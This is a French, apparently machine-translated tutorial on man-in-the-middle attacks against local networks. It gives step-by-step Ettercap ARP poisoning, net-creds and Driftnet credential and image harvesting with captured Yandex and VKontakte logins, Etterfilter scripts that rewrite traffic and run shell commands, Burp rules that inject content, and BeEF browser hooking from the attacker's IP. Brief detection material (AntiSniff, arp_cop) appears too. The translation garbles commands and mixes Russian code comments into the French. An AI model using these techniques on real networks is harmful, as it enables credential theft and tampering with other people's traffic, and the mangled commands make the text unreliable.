maison › Installation et configuration › Les pirates l'utilisent pour rediriger le trafic. Méthodes d'attaques de pirates. Usurpation de données avec Burp

Les pirates l'utilisent pour rediriger le trafic. Méthodes d'attaques de pirates. Usurpation de données avec Burp

Méthodes d'interception du trafic réseau

L'écoute du réseau à l'aide de programmes d'analyse de réseau est la première et la plus d'une manière simple interception de données.

Pour vous protéger contre les écoutes réseau, utilisez programmes spéciaux, par exemple AntiSniff, qui sont capables d'identifier les ordinateurs du réseau qui écoutent le trafic réseau.

Pour résoudre leurs problèmes, les programmes anti-renifleurs utilisent un signe spécial de présence de périphériques d'écoute sur le réseau - la carte réseau de l'ordinateur renifleur doit être dans un mode d'écoute spécial. En mode écoute, les ordinateurs du réseau réagissent de manière particulière aux datagrammes IP envoyés à l'hôte testé. Par exemple, les hôtes en écoute traitent généralement tout le trafic entrant, et pas seulement les datagrammes envoyés à l'adresse de l'hôte. Il existe d'autres signes indiquant un comportement suspect de l'hôte qu'AntiSniff peut reconnaître.

Sans aucun doute, les écoutes clandestines sont très utiles du point de vue d'un attaquant, car elles permettent d'obtenir de nombreuses informations utiles - mots de passe transmis sur le réseau, adresses des ordinateurs du réseau, données confidentielles, lettres, etc. Cependant, une simple écoute clandestine ne permet pas à un pirate informatique d’interférer avec la communication réseau entre deux hôtes afin de modifier et de corrompre des données. Pour résoudre un tel problème, une technologie plus complexe est nécessaire.

Riz. 1 Fausses requêtes ARP

Voyons comment un pirate informatique peut utiliser ARP pour intercepter les communications réseau entre les hôtes A et B.

Pour intercepter le trafic réseau entre les hôtes A et B, le pirate impose son adresse IP à ces hôtes, afin que A et B utilisent cette adresse IP falsifiée lors des échanges de messages. Pour imposer son adresse IP, le hacker effectue les opérations suivantes.

L'attaquant détermine les adresses MAC des hôtes A et B, par exemple à l'aide de la commande nbtstat du package W2RK.
L'attaquant envoie des messages aux adresses MAC identifiées des hôtes A et B, qui sont des réponses ARP falsifiées aux demandes de résolution des adresses IP des hôtes en adresses MAC des ordinateurs. L'hôte A est informé que l'adresse IP de l'hôte B correspond à l'adresse MAC de l'ordinateur de l'attaquant ; l’hôte B est informé que l’adresse IP de l’hôte A correspond également à l’adresse MAC de l’ordinateur de l’attaquant.
Les hôtes A et B stockent les adresses MAC reçues dans leurs caches ARP, puis les utilisent pour s'envoyer des messages. Puisque les adresses IP A et B correspondent à l’adresse MAC de l’ordinateur de l’attaquant, les hôtes A et B communiquent sans s’en douter via un intermédiaire qui peut tout faire avec leurs messages.

Sur les réseaux UNIX, ce type d'attaque par requête ARP usurpée peut être mis en œuvre à l'aide d'utilitaires système pour surveiller et gérer le trafic réseau, par exemple arpredirect. Malheureusement, ces utilitaires fiables ne semblent pas être implémentés sur les réseaux Windows. Par exemple, sur le site NTsecurity, vous pouvez télécharger l'utilitaire GrabitAII, présenté comme un outil de redirection du trafic entre les hôtes du réseau. Cependant, une vérification de base des fonctionnalités de l'utilitaire GrabitAII montre que le succès complet dans la mise en œuvre de ses fonctions est encore loin.

Pour intercepter le trafic réseau, un attaquant peut usurper la véritable adresse IP d'un routeur réseau avec sa propre adresse IP, par exemple en utilisant des messages de redirection ICMP falsifiés. L'hôte A doit, selon la RFC-1122, percevoir le message de redirection reçu comme une réponse à un datagramme envoyé à un autre hôte, par exemple B. L'hôte A détermine ses actions sur le message de redirection en fonction du contenu du message de redirection reçu, et si la redirection des datagrammes est spécifiée dans Redirection de A vers B le long d'une nouvelle route, c'est exactement ce que fera l'hôte A.

Riz. 2 Faux routage

Pour effectuer un faux routage, l'attaquant doit connaître certains détails sur l'organisation réseau local, dans lequel se trouve l'hôte A, notamment l'adresse IP du routeur via lequel le trafic est envoyé de l'hôte A vers B. Sachant cela, l'attaquant générera un datagramme IP dans lequel l'adresse IP de l'expéditeur est définie comme l'adresse IP du routeur. et le destinataire est l'hôte A spécifié. Le datagramme contient également un message de redirection ICMP avec le champ d'adresse du nouveau routeur défini sur l'adresse IP de l'ordinateur de l'attaquant. Après avoir reçu un tel message, l'hôte A enverra tous les messages à l'adresse IP de l'ordinateur de l'attaquant.

Pour vous protéger contre une telle attaque, vous devez désactiver (par exemple, à l'aide d'un pare-feu) le traitement des messages de redirection ICMP sur l'hôte A, et la commande tracert (sous Unix, il s'agit de la commande tracerout) peut révéler l'adresse IP de l'ordinateur de l'attaquant. . Ces utilitaires sont capables de retrouver une route supplémentaire apparue sur le réseau local et non prévue lors de l'installation, à moins bien sûr que l'administrateur réseau soit vigilant.

Les exemples d'interceptions ci-dessus (auxquels les capacités des attaquants sont loin d'être limitées) nous convainquent de la nécessité de protéger les données transmises sur le réseau si les données contiennent des informations confidentielles. La seule méthode de protection contre les interceptions du trafic réseau consiste à utiliser des programmes qui mettent en œuvre des algorithmes cryptographiques et des protocoles de cryptage et empêchent la divulgation et la substitution d'informations secrètes. Pour résoudre ces problèmes, la cryptographie fournit les moyens de chiffrer, signer et vérifier l'authenticité des messages transmis via des protocoles sécurisés.

La mise en œuvre pratique de toutes les méthodes cryptographiques de protection de l'échange d'informations est assurée par Réseaux VPN(Réseau privé virtuel - Réseaux privés virtuels).

Interception de connexion TCP

L'attaque d'interception de trafic réseau la plus sophistiquée doit être considérée comme la capture de connexion TCP (détournement TCP), lorsqu'un pirate informatique interrompt la session de communication en cours avec l'hôte en générant et en envoyant des paquets TCP à l'hôte attaqué. Ensuite, en utilisant la capacité du protocole TCP à restaurer une connexion TCP interrompue, le pirate informatique intercepte la session de communication interrompue et la poursuit à la place du client déconnecté.

Le protocole TCP (Transmission Control Protocol) est l'un des protocoles de transport de base. Niveau OSI, vous permettant d'établir des connexions logiques sur un canal de communication virtuel. Sur ce canal, les paquets sont transmis et reçus avec leur séquence enregistrée, le flux des paquets est contrôlé, la retransmission des paquets déformés est organisée et en fin de session le canal de communication est rompu. TCP est le seul protocole protocole de base de la famille TCP/IP, qui dispose d'un système avancé d'identification et de connexion des messages.

Présentation des renifleurs de paquets logiciels

Tous les renifleurs de logiciels peuvent être divisés en deux catégories : les renifleurs qui prennent en charge le lancement depuis ligne de commande, et des renifleurs avec une interface graphique. Cependant, notons qu’il existe des renifleurs qui combinent ces deux capacités. De plus, les renifleurs diffèrent les uns des autres par les protocoles qu'ils prennent en charge, la profondeur de l'analyse des paquets interceptés, la possibilité de configurer des filtres et la possibilité de compatibilité avec d'autres programmes.

Habituellement, la fenêtre de tout renifleur avec interface graphique se compose de trois domaines. Le premier d'entre eux affiche les données récapitulatives des paquets interceptés. Typiquement, cette zone affiche un minimum de champs, à savoir : l'heure d'interception des paquets ; Adresses IP de l'expéditeur et du destinataire du paquet ; Adresses MAC de l'expéditeur et du destinataire du paquet, adresses des ports source et destination ; type de protocole (couche réseau, transport ou application) ; quelques informations récapitulatives sur les données interceptées. La deuxième zone affiche des informations statistiques sur le package individuel sélectionné, et enfin la troisième zone affiche le package sous forme de caractères hexadécimaux ou ASCII.

Presque tous les renifleurs de paquets vous permettent d'analyser les paquets décodés (c'est pourquoi les renifleurs de paquets sont également appelés analyseurs de paquets ou analyseurs de protocole). Le renifleur distribue les paquets interceptés entre les couches et les protocoles. Certains renifleurs de paquets sont capables de reconnaître le protocole et d'afficher les informations capturées. Ce type d'informations est généralement affiché dans la deuxième zone de la fenêtre du renifleur. Par exemple, n'importe quel renifleur peut reconnaître le protocole TCP, et les renifleurs avancés peuvent déterminer quelle application a généré ce trafic. La plupart des analyseurs de protocoles reconnaissent plus de 500 protocoles différents et peuvent les décrire et les décoder par leur nom. Plus un renifleur peut décoder et afficher d’informations à l’écran, moins il devra être décodé manuellement.

Un problème que les renifleurs de paquets peuvent rencontrer est l'incapacité d'identifier correctement un protocole utilisant un port autre que le port par défaut. Par exemple, pour améliorer la sécurité, certaines applications connues peuvent être configurées pour utiliser des ports autres que les ports par défaut. Ainsi, au lieu du traditionnel port 80 réservé au serveur web, ce serveur Vous pouvez le reconfigurer de force sur le port 8088 ou tout autre. Dans cette situation, certains analyseurs de paquets ne sont pas capables de déterminer correctement le protocole et d'afficher uniquement des informations sur le protocole de niveau inférieur (TCP ou UDP).

Il existe des renifleurs de logiciels fournis avec des modules d'analyse logiciels sous forme de plugins ou de modules intégrés qui vous permettent de créer des rapports contenant des informations analytiques utiles sur le trafic intercepté.

Une autre caractéristique de la plupart des analyseurs de paquets logiciels est la possibilité de configurer des filtres avant et après la capture du trafic. Les filtres sélectionnent certains paquets du trafic général selon un critère donné, ce qui permet de s'affranchir des informations inutiles lors de l'analyse du trafic.

Alternatives à Ettercap

Ettercap est le logiciel d’attaque de l’homme du milieu le plus populaire, mais est-il le meilleur ? Tout au long des instructions, vous verrez qu'Ettercap n'est presque jamais utilisé seul, que tel ou tel programme est toujours construit avec lui dans une chaîne de traitement du trafic. Cela ajoute peut-être de la flexibilité ; en général, cette approche est la base d'UNIX : un programme effectue une tâche et l'utilisateur final combine différents programmes pour obtenir le résultat souhaité. Avec cette approche, le code du programme est plus facile à maintenir ; à partir de ces « briques » miniatures, vous pouvez construire un système de n'importe quelle complexité et flexibilité. Cependant, disposer de cinq consoles ouvertes avec des tâches différentes, dont les programmes visent à obtenir un seul résultat, n'est pas très pratique, c'est tout simplement plus compliqué, il y a une possibilité de se tromper à un moment donné, et l'ensemble est configuré le système fonctionnera en vain.

Renifler Net-Creds :

URL visitées
Requêtes POST envoyées
identifiants/mots de passe à partir de formulaires HTTP
identifiants/mots de passe pour l'authentification HTTP de base
Recherches HTTP
Connexions/mots de passe FTP
Identifiants/mots de passe IRC
Identifiants/mots de passe POP
Identifiants/mots de passe IMAP
Identifiants/mots de passe Telnet
Identifiants/mots de passe SMTP
Chaîne de communauté SNMP
tous les protocoles NTLMv1/v2 pris en charge comme HTTP, SMB, LDAP, etc.
Kerberos

Une bonne sélection d'images interceptées, et le filet dérivant est plus simple à cet égard - il ne montre que les images interceptées.

Mettez votre appareil en mode transfert.

Écho "1" > /proc/sys/net/ipv4/ip_forward

Lancez Ettercap avec une interface graphique (-G) :

Ettercap-G

Sélectionnez maintenant Hôtes, il y a un sous-élément Rechercher des hôtes. Une fois l'analyse terminée, sélectionnez la liste des hôtes :

En tant que Target1, sélectionnez le routeur (Ajouter à la cible 1), en tant que Target2, sélectionnez l'appareil que vous allez attaquer (Ajouter à la cible 2).

Mais c'est ici que le premier problème peut survenir, surtout s'il y a beaucoup d'hôtes. Dans diverses instructions, y compris dans la vidéo présentée ci-dessus, les auteurs grimpent sur la machine cible (tout le monde, pour une raison quelconque, a Windows) et à l'aide de la commande ils regardent l'IP de cette machine sur le réseau local. D'accord, cette option est inacceptable dans des conditions réelles.

Si vous numérisez en utilisant , vous pouvez en obtenir Informations Complémentaires sur les hôtes, plus précisément sur le fabricant de la carte réseau :

Nmap-sn 192.168.1.0/24

Si les données ne suffisent toujours pas, vous pouvez effectuer une analyse pour déterminer le système d'exploitation :

Nmap-O 192.168.1.0/24

Comme nous pouvons le voir, la machine avec l'IP 192.168.1.33 s'est avérée être Windows, si ce n'est pas un signe d'en haut, alors qu'est-ce que c'est ? 😉MDR

C’est ce que nous ajoutons comme deuxième objectif.

Allez maintenant à l'élément de menu Mitm. Là, sélectionnez Empoisonnement ARP... Cochez la case Sniff connexions à distance.

Nous commençons à récolter, dans une fenêtre nous lançons

Crédits nets

dans un autre (les deux programmes peuvent être exécutés sans options)

Filet dérivant

La collecte des données a commencé immédiatement :

Sur le côté droit, Driftnet a ouvert une autre fenêtre dans laquelle il affiche les images interceptées. Dans la fenêtre net-creds, nous voyons les sites visités et les mots de passe interceptés :

1.2 Ettercap + Burp Suite
3. Afficher les données (sites visités et mots de passe capturés) dans Ettercap

Dans le menu Affichage, nous avons accès aux onglets Connexions et Profils. Vous pouvez également cocher la case Résoudre les adresses IP. Les connexions sont, bien sûr, des connexions. Ettercap collecte des profils en mémoire pour chaque hôte découvert. Les utilisateurs et les mots de passe y sont collectés. Dans ce cas, les profils avec des données de compte capturées (mots de passe) sont marqués d'une croix :

Il n'est pas nécessaire de trop s'appuyer sur les profils - par exemple, les identifiants et mots de passe interceptés pour FTP et d'autres services sont marqués, pour lesquels le programme peut clairement interpréter les informations reçues comme des informations d'identification. Cela n'inclut pas, par exemple, les données d'authentification de base, les identifiants et les mots de passe saisis dans les formulaires Web.

Dans Connections, les données les plus prometteuses sont marquées d'un astérisque :

Vous pouvez double-cliquer sur ces entrées pour afficher les détails :

Afin de ne pas rechercher ces étoiles dans la liste, vous pouvez trier selon ce champ et elles apparaîtront toutes en haut ou en bas :

Authentification de base capturée :

Mot de passe de connexion pour Yandex (mis en évidence ci-dessous) :

Voici les informations d'identification interceptées pour VKontakte :

Aussi, les données les plus intéressantes sont collectées dans la console inférieure :

Si vous souhaitez enregistrer les résultats du programme, utilisez ces options (précisez les touches au démarrage d'Ettercap :

Options de journalisation : -w, --write écrire les données capturées dans pcapfile -L, --log écrire tout le trafic dans ce -l, --log-info écrire uniquement les informations passives dans ce -m, --log-msg écrire tous les messages dans ce -c, --compress utilise la compression gzip pour les fichiers journaux

4. Substitution de données à la volée dans Ettercap
4.1 Utilisation des filtres personnalisés Ettercap

Remarque : Malgré tous les tests, les filtres Ettercap ne fonctionnent toujours pas pour moi. Il est difficile de comprendre s'il s'agit de mains, de fonctionnalités matérielles ou d'une erreur dans le programme lui-même... Mais pour la version 0.8.2 (la dernière en date pour le moment), il existe un rapport de bug concernant des problèmes avec les filtres. En général, à en juger par les rapports de bugs et les forums, les filtres tombent souvent ou ne fonctionnent plus du tout depuis longtemps. Il y a une branche où des modifications ont été apportées il y a 5 mois https://github.com/Ettercap/ettercap/tree/filter-improvements, c'est-à-dire améliorations des filtres (avec améliorations des filtres). Tant pour cette branche que pour la version du référentiel, une grande variété de tests ont été effectués, divers filtres ont été testés dans différentes conditions, beaucoup de temps a été passé, mais il n'y a eu aucun résultat. À propos, pour installer la version améliorée des filtres dans Kali Linux, vous devez procéder comme suit :

Sudo apt-get supprimer ettercap-graphical ettercap-common sudo apt-get install git debhelper bison check cmake flex ghostscript libbsd-dev libcurl4-openssl-dev libgtk2.0-dev libltdl-dev libluajit-5.1-dev libncurses5-dev libnet1-dev libpcap-dev libpcre3-dev libssl-dev libgtk-3-dev ghostscript groff libtool libpcre3 libncurses5-dev git clone -b filter-improvements https://github.com/Ettercap/ettercap.git cd ettercap/ mkdir build cd build cmake ENABLE_PDF_DOCS =On ../ make sudo make install

En général, si vos filtres ne fonctionnent pas, vous n'êtes pas seul. Dans les instructions sur Ettercap, je ne peux pas ignorer le sujet des filtres, ils seront donc abordés dans tous les cas.

Jusqu'à présent, nous avons utilisé Ettercap pour l'usurpation d'identité ARP. C'est une application très superficielle. Grâce à des filtres personnalisés, nous pouvons intervenir et modifier le trafic à la volée. Les filtres doivent être contenus dans des fichiers séparés et doivent être compilés à l'aide du programme Etterfilter avant utilisation. Bien que la documentation vers laquelle le lien est donné semble rare, mais couplée aux exemples donnés ci-dessous, elle vous permettra d'écrire des filtres assez intéressants.

Créons notre premier filtre, il remplacera toutes les images par ceci :

Dans un fichier nommé img_replacer.filter copie :

If (ip.proto == TCP && tcp.dst == 80) ( if (search(DATA.data, "Accept-Encoding")) ( replace("Accept-Encoding", "Accept-Rubbish!"); # remarque : la chaîne de remplacement a la même longueur que l'original msg("zapped Accept-Encoding!\n"); ) ) if (ip.proto == TCP && tcp.src == 80) ( replace("src=" , " src=\"http://www.irongeek.com/images/jollypwn.png\" "); remplacer("SRC=", "src=\"http://www.irongeek.com/images/ jollypwn. png\" "); replace("src =", "src=\"http://www.irongeek.com/images/jollypwn.png\" "); replace("SRC =", "src= \" http://www.irongeek.com/images/jollypwn.png\" "); msg("Filter Ran.\n"); )

Compilez le fichier :

Etterfilter img_replacer.filter -o img_replacer.ef

Résultats de la compilation :

Etterfilter 0.8.2 copyright 2001-2015 Ettercap Development Team 14 tables de protocole chargées : DONNEES DÉCODÉES udp tcp esp gre icmp ipv6 ip arp wifi fddi tr eth 13 constantes chargées : VRRP OSPF GRE UDP TCP ESP ICMP6 ICMP PPTP PPPOE IP6 IP ARP Fichier source d'analyse "img_replacer.filter" terminé. Dépliage du méta-arbre terminé. Conversion des étiquettes en décalages réels terminée. Écriture de la sortie dans "img_replacer.ef" terminée. -> Script codé en 18 instructions.

Le commutateur -F indique au programme de charger le filtre à partir du fichier qui suit le commutateur. Après compilation, le nom de notre nouveau fichier avec le filtre est img_replacer.ef, la commande prend donc la forme :

Ettercap -G -F img_replacer.ef

Remarque : Lorsque vous surveillez le trafic Web, les paquets que vous voyez peuvent être sous forme cryptée. Pour travail efficace filtres, Ettercap a besoin de trafic sous la forme texte brut. Selon certaines observations, le type d'encodage utilisé par les pages Web est "Accept-Encoding : gzip, deflate".

Vous trouverez ci-dessous un filtre qui écrase l'encodage, forçant la communication sous forme de texte brut :

If (ip.proto == TCP && tcp.dst == 80) ( if (search(DATA.data, "gzip")) ( replace("gzip", " "); # remarque : quatre espaces dans la chaîne remplacée msg ("gzip blanchi\n"); ) ) if (ip.proto == TCP && tcp.dst == 80) ( if (search(DATA.data, "deflate")) ( replace("deflate", " "); # remarque : sept espaces dans la ligne remplacée msg("whited out deflate\n"); ) )

La syntaxe d'écriture des filtres est décrite en détail, puis il y a quelques exemples supplémentaires :

# remplacement de texte dans un paquet : if (ip.proto == TCP && search(DATA.data, "lol"))( replace("lol", "smh"); msg("filter ran"); ) # show message, si le port TCP est 22 if (ip.proto == TCP) ( if (tcp.src == 22 || tcp.dst == 22) ( msg("SSH packet\n"); ) ) # écrire tout le trafic telnet, exécutez également ./program pour chaque paquet if (ip.proto == TCP) ( if (tcp.src == 23 || tcp.dst == 23) ( log(DATA.data, "./ logfile.log "); exec("./program"); ) ) # enregistrer tout le trafic sauf http if (ip.proto == TCP && tcp.src != 80 && tcp.dst != 80) ( log (DATA.data , "./logfile.log"); ) # certaines opérations sur la charge utile du paquet if (DATA.data + 20 == 0x4142) ( DATA.data + 20 = 0x4243; ) else ( DATA.data = " modifié"; DATA .data + 20 = 0x4445; ) # supprime tous les paquets contenant "ettercap" if (search(DECODED.data, "ettercap")) ( msg("quelqu'un parle de nous...\n") ; drop( ); kill(); ) # enregistre les paquets ssh déchiffrés correspondant à l'expression régulière if (ip.proto == TCP) ( if (tcp.src == 22 || tcp.dst == 22) ( if (regex(DECODED.data, ".*login.*")) ( log(DECODED.data, "./decrypted_log"); ) ) ) # tuer les paquets if (ip.ttl< 5) { msg("The packet will die soon\n"); } # то же самое для IPv6, но делая тривиальный тест убеждаемся, что перед нами действительно IPv6 пакеты if (eth.proto == IP6 && ipv6.hl < 5) { msg("The IPv6 packet will die soon\n"); } # сравнение строки на данный сдвиг if (DATA.data + 40 == "ette") { log(DATA.data, "./logfile"); } # вставить файл после указанного пакета if (tcp.src == 21 && search(DATA.data, "root")) { inject("./fake_response"); } # целиком заменить пакет на другой if (tcp.src == 23 && search(DATA.data, "microsoft")) { drop(); inject("./fake_telnet"); } # Изменение бинарных данных используя внешнюю программу if (udp.dst == 53 && pcre_regex(DATA.data, ".*\x03com\x00.*")) { log(DATA.data, "/tmp/payload"); drop(); execinject("/bin/sed "s/\x03com\x00/\x02my\x04page\x02de\x00/g" /tmp/payload"); udp.len += 7; exec("/bin/rm /tmp/payload"); msg("faked"); } # фильтровать только указанный IP адрес if (ip.src == "192.168.0.2") { drop(); } # делать то же самое для IPv6 if (ipv6.src == "2001:db8::1") { drop(); } # комбинируем IPv4 и IPv6 if (eth.proto == IP && ip.dst == "192.168.0.2") { msg("drop IPv4"); drop(); } if (eth.proto == IP6 && ipv6.dst == "2001:db8::1") { msg("drop IPv6"); drop(); } # транслировать tcp пакеты с порта 80 на 81 if (tcp.dst == 80) { tcp.dst -= 1; tcp.dst += 2; } # найти и покалечить пакеты ESP if (ip.proto == ESP) { DATA.data = "DEADDECAF"; }

4.2 Substitution de données à l'aide de Burp

Nous lançons Ettercap et Burp comme décrit au paragraphe 1.2 ou au paragraphe 2.2.

Dans Burp, allez dans Proxy -> Options. On y retrouve Match et Remplacer. Cliquez sur Ajouter pour ajouter une nouvelle règle.

L'en-tête de la requête est l'en-tête de la requête
Corps de la requête - corps de la requête
En-tête de réponse - en-tête de réponse
Corps de réponse - corps de réponse
Nom du paramètre de demande - Nom du paramètre de demande
Valeur du paramètre de demande - Valeur du paramètre de demande
Première ligne de la requête - Première ligne de la requête

Si vous devez modifier les données transmises par la méthode GET, cela s'applique aux en-têtes.

Dans le balisage HTML, il existe également head (balise head). Ceux cités juste au-dessus n’ont rien à voir avec ce titre. Un peu plus haut on parle d'en-têtes de paquets. Si vous souhaitez modifier le contenu Pages HTML, alors vous devez toujours sélectionner Corps de réponse au lieu de En-tête de demande, même si vous envisagez de modifier le contenu de la balise head (par exemple, le titre).

Si vous n'êtes pas familier avec expressions régulières, alors, en principe, il n'y a pas de quoi s'inquiéter : HTML pardonne beaucoup, et ce qu'il ne comprend pas, il l'ignore simplement - vous pouvez l'utiliser. Si vous savez utiliser les expressions régulières, alors je vous respecte.)))

Par exemple, créons une nouvelle règle, en remplaçant l'en-tête de la requête par le corps de la réponse. Dans la règle elle-même, nous changerons

Pas de titre

Cochez la case de correspondance Regex.

Désormais sur tous les sites (sans HTTPS) le titre sera No Title :

Insérez une ligne arbitraire après la balise body (ce sera la première ligne du texte). L’en-tête de la demande est remplacé par le corps de la réponse. Nous changeons

Cochez la case de correspondance Regex.

Dans le coin supérieur droit (selon la mise en page) apparaît l'inscription « Je suis cool ! » Vous pouvez insérer du CSS, du code JavaScript, n'importe quel texte, n'importe quoi. Vous pouvez généralement tout supprimer de la page, puis la remplir avec votre propre contenu - tout dépend de votre imagination.

L’idée était de modifier légèrement chaque formulaire pour que les données soient envoyées au serveur d’origine et au serveur de l’attaquant (implémenter le multi-submit pour chaque formulaire). Mais étant donné que si les données transmises ne sont pas cryptées et que nous y avons accès, alors nous les voyons déjà, il n'est pas nécessaire de les envoyer à un serveur. Cependant, si quelqu'un a besoin d'un exemple vraiment fonctionnel d'envoi de données d'un formulaire à plusieurs serveurs à la fois.

5. Connexion sur BeEF

Pour commencer à utiliser les capacités de BeEF, nous devons intégrer un fichier JavaScript dans le code HTML, généralement une ligne comme :

Les deux méthodes suivantes diffèrent uniquement par la méthode d'intégration de cette chaîne.

5.1 Raccordement de BeEF à l'aide de filtres Ettercap

[section à préparer plus tard]

5.2 Connecter BeEF avec Burp

Vous devez commencer exactement comme écrit au paragraphe 4.2. Seulement, au lieu de remplacer les en-têtes et d'ajouter du texte au site, nous implémenterons du code JavaScript sous la forme d'une ligne :

Dans mon cas, ce fichier est disponible sur IP 192.168.1.36 sur le port 3000. Le fichier s'appelle hook.js (peut être modifié dans les paramètres). Ceux. dans mon cas, je dois injecter la ligne :

Cela peut être fait, par exemple, en créant une nouvelle règle, en remplaçant l'en-tête de la requête par le corps de la réponse. Le remplacement doit avoir lieu dans le code HTML lui-même

Génial, lorsque vous ouvrez un site Web qui n'a pas HTTPS, du code JavaScript est inséré dans le code HTML, ce qui vous permet de collecter des informations via un navigateur accroché et de mener diverses attaques :

6. Infection par des portes dérobées

Vous pouvez remplacer et infecter les fichiers exécutables en utilisant à la fois les filtres Ettercap [qui, pour une raison quelconque, ne fonctionnent plus] et en utilisant applications tierces. Par exemple, BDFProxy peut le faire à la volée. Malheureusement, BDFProxy est encore sous le choc de la mise à jour Backdoor Factory d'avril 2016 : le package libmproxy a été renommé mitmproxy en Python. Pour BDFProxy, le package libmproxy est une dépendance nécessaire ; sans ce package, le programme ne démarrera pas. Par conséquent, maintenant, avant la « réparation » de BDFProxy, il est impossible de l'utiliser, car même avec Backdoor Factory installé, le programme BDFProxy se plaint de l'absence de la bibliothèque libmproxy...

Une opération similaire peut être effectuée avec Burp Suite. L'algorithme étape par étape est présenté ; cela n'a aucun sens de le réécrire dans cette section.

7. Utiliser les plugins Ettercap

Des informations sur les plugins Ettercap peuvent être trouvées. Il existe pas mal de plugins ; ceux décrits ci-dessous me semblent les plus intéressants.

Des plugins peuvent être connectés au lancement d'Ettercap, il existe une option pour cela :

P, --plugin exécute ceci

Les plugins peuvent également être chargés depuis l'interface graphique :

[MATÉRIEL EN PRÉPARATION]

7.1 arp_cop

Il signale les activités ARP suspectes en surveillant passivement les demandes/réponses ARP. Il peut signaler des tentatives d’empoisonnement ARP ou de simples conflits IP ou changements d’IP. Si vous créez une première liste d’hôtes, le plugin fonctionnera avec plus de précision.

Ettercap -TQP arp_cop //

Un exemple de détection réelle d’usurpation d’ARP :

Développer

Mial@HackWare-Mint ~ $ sudo ettercap -TQP arp_cop // mot de passe pour mial : ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team En écoute sur : eth0 -> 08:00:27:A3:08:4A 192.168.1.36/ 255.255.255.0 fe80::a00:27ff:fea3:84a/64 La dissection SSL nécessite un script "redir_command_on" valide dans le fichier etter.conf Privilèges déposés sur EUID 65534 EGID 65534... 33 plugins 42 dissecteurs de protocole 57 ports surveillés 20530 mac empreinte digitale du fournisseur 1766 empreinte digitale du système d'exploitation TCP 2182 services connus Randomisation de 255 hôtes pour l'analyse... Analyse de l'ensemble du masque de réseau pour 255 hôtes... * |====== ================ ============================>| 100,00 % 3 hôtes ajoutés à la liste des hôtes... Démarrage du reniflage unifié... Texte uniquement Interface activée... Appuyez sur "h" pour l'aide en ligne Activation du plugin arp_cop... arp_cop : plugin en cours d'exécution... arp_cop : (nouvel hôte ) 192.168.1.1 arp_cop : (AVERTISSEMENT) 192.168.1.35 se fait passer pour 192.168.1.1 arp_cop : (AVERTISSEMENT) 192.168.1.35 se fait passer pour 192.168.1.1 arp_cop : (AVERTISSEMENT) 192.168.1.35 fait semblant de être 192.168.1.1 arp_cop : ( AVERTISSEMENT ) 192.168.1.35 prétend être 192.168.1.1 arp_cop : (AVERTISSEMENT) 192.168.1.35 prétend être 192.168.1.1 arp_cop : (AVERTISSEMENT) 192.168.1.35 prétend être 192.168.1.1 arp_cop : (AVERTISSEMENT ) 192.168.1.35 fait semblant de be 192.168 .1.1 arp_cop : (AVERTISSEMENT) 192.168.1.35 prétend être 192.168.1.1 arp_cop : (AVERTISSEMENT) 192.168.1.35 prétend être 192.168.1.1 arp_cop : (AVERTISSEMENT) 192.168.1.35 prétend être 192.1 68.1.1 arp_cop : ( AVERTISSEMENT) 192.168.1.35 prétend être 192.168.1.1 arp_cop : (AVERTISSEMENT) 192.168.1.35 prétend être 192.168.1.1 arp_cop : (AVERTISSEMENT) 192.168.1.35 prétend être 192.168.1.1 arp_cop : (AVERTISSEMENT) ) 192.1 68.1.35 fait semblant de be 192.168.1.1 arp_cop : (AVERTISSEMENT) 192.168.1.35 prétend être 192.168.1.1 arp_cop : (AVERTISSEMENT) 192.168.1.35 prétend être 192.168.1.1 arp_cop : (AVERTISSEMENT) 192.168.1.35 prétend être 192.168.1.1 arp_cop : (AVERTISSEMENT) 192.168.1.35 prétend être 192.168.1.1 arp_cop : (AVERTISSEMENT) 192.168.1.35 prétend être 192.168.1.1 arp_cop : (AVERTISSEMENT) 192.168.1.35 prétend être 192.168.1.1 arp_cop : (W ARNING) 192.168.1.3 5 fait semblant être 192.168.1.1 arp_cop : (AVERTISSEMENT) 192.168.1.35 fait semblant d'être 192.168.1.1 arp_cop : (AVERTISSEMENT) 192.168.1.35 fait semblant d'être 192.168.1.1 arp_cop : (AVERTISSEMENT) 192.168.1.35 fait semblant d'être 192.168.1.1 arp_cop : ( AVERTISSEMENT) 192.168.1.35 prétend être 192.168.1.1 arp_cop : (AVERTISSEMENT) 192.168.1.35 prétend être 192.168.1.1 arp_cop : (AVERTISSEMENT) 192.168.1.35 prétend être 192.168.1.1 arp_cop : (AVERTISSEMENT) 192.168.1.35 fait semblant d'être 192. 168.1.1 arp_cop : (AVERTISSEMENT) 192.168.1.35 prétend être 192.168.1.1 arp_cop : (AVERTISSEMENT) 192.168.1.35 prétend être 192.168.1.1 arp_cop : (AVERTISSEMENT) 192.168.1.35 prétend être 19 2. 168.1.1 arp_cop : (AVERTISSEMENT ) 192.168.1.35 prétend être 192.168.1.1 arp_cop : (AVERTISSEMENT) 192.168.1.35 prétend être 192.168.1.1 arp_cop : (AVERTISSEMENT) 192.168.1.35 prétend être 192.168.1.1 arp_cop : (AVERTISSEMENT ) 192.168.1.35 prétend être 192.168 . 1.1 arp_cop : (AVERTISSEMENT) 192.168.1.35 prétend être 192.168.1.1 arp_cop : (AVERTISSEMENT) 192.168.1.35 prétend être 192.168.1.1 arp_cop : (AVERTISSEMENT) 192.168.1.35 prétend être 192.16 8.1.1 arp_cop : (AVERTISSEMENT) 192.168.1.35 prétend être 192.168.1.1 arp_cop : (AVERTISSEMENT) 192.168.1.35 prétend être 192.168.1.1 arp_cop : (AVERTISSEMENT) 192.168.1.35 prétend être 192.168.1.1 arp_cop : (AVERTISSEMENT) 192.16 8.1.35 prétend être 192.168 .1.1................................

7.2 ajout automatique

Il ajoutera automatiquement de nouvelles victimes au fur et à mesure qu’elles se connecteront à l’attaque mitm d’empoisonnement ARP. Il recherche les requêtes ARP sur le réseau local, et s'il est détecté, le plugin ajoutera l'hôte à la liste des victimes si la liste a été spécifiée comme CIBLE. Un hôte est ajouté lorsqu'une requête arp est visible depuis celui-ci.

7.3 chk_poison

Il vérifie si les modules arp etch dans ettercap réussissent. Il envoie des paquets d'écho ICMP falsifiés à toutes les victimes d'appâtage tout en se faisant passer pour chaque victime. Il peut capter une réponse ICMP avec notre adresse MAC comme destination, ce qui signifie que l'appâtage entre les deux cibles réussit. Il vérifie les deux chemins de chaque connexion.

7.4 DNS_spoof

